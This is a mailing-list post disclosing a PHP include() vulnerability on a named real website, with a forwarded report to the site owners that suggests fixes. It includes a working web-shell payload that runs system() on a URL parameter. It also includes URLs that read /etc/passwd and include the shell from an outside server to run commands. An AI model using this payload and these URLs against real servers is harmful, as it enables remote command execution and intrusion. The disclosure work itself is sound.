PHP execution vulnerability on www.neo-modus.com (direct connect homepage)

[burpz () gmx net (burpz () gmx net)]

> neo-modus.com is the home of the quite popular file sharing utility
> 'direct
> connect', unfortunately their website is vulnerable to a common php
> include()
> vulnerability. Message below was send 2 weeks ago to the 'bugs' email
> address listed on their website. I didn't get any response.
>
> --- Forwarded Message ---
> > Dear Reader,
> >
> > I recently stumbled across your website www.neo-modus.com, I fiddled
> > around
> > a bit with the .php scripts, and found that they are vulnerable to a
> very
> > common php error.
> >
> > The index.php script takes a parameter 'page', so it knows what page to
> > show. It then passes the value of this parameter DIRECTLY into a
> include()
> > statement. This is very, very bad. Let's say I go to the url:
> > http://www.neo-modus.com/?page=/etc/passwd - this tries to open
> > /etc/passwd.html - so i can break
> > out of the document root and view every file with an .html (or .php?)
> > extension. This seems not too bad, but there's more. PHP has a feature
> > called
> > "furl_open", which allows include() to take an URL as a parameter to
> > include it in
> > it's page. So we create a text file on a different webserver (which
> doesnt
> > parse .txt files) called test.txt, which contains:
> >
> > <?php
> >   printf("<div align=\"left\"><pre>");
> >   printf("%s", nl2br(system($HTTP_GET_VARS['cmd'])));
> >   printf("</pre></div>");
> > ?>
> >
> > we then go to the url
> > http://www.neo-modus.com/?page=http://my.webpage.com/test.txt&cmd=ls -al
> >
> > and we get a nice "ls -al" output runned on YOUR webserver. We can run
> all
> > commands with privileges of the webserver. I think you can understand
> how
> > bad
> > this is.
> >
> > To fix these issues, I suggest you disable furl_open in the php
> > configuration file, and filter the "page" parameter passed to index.php
> so
> > that it strips
> > slashes, backslashes, dots and limits it to a specific directory only.
> >
> > Another thing: don't place files which contain password information in
> the
> > document root. ConnectToDatabase.php contains sensitive information.
> > Change
> > your mysql passwords, and limit access to the mysql server from YOUR
> > website
> > host only. I could connect without problems - this should not be the
> case.
> >

-- 
+++ GMX - Mail, Messaging & more  http://www.gmx.net +++
NEU: Mit GMX ins Internet. Günstige DSL- & Modem/ISDN-Tarife!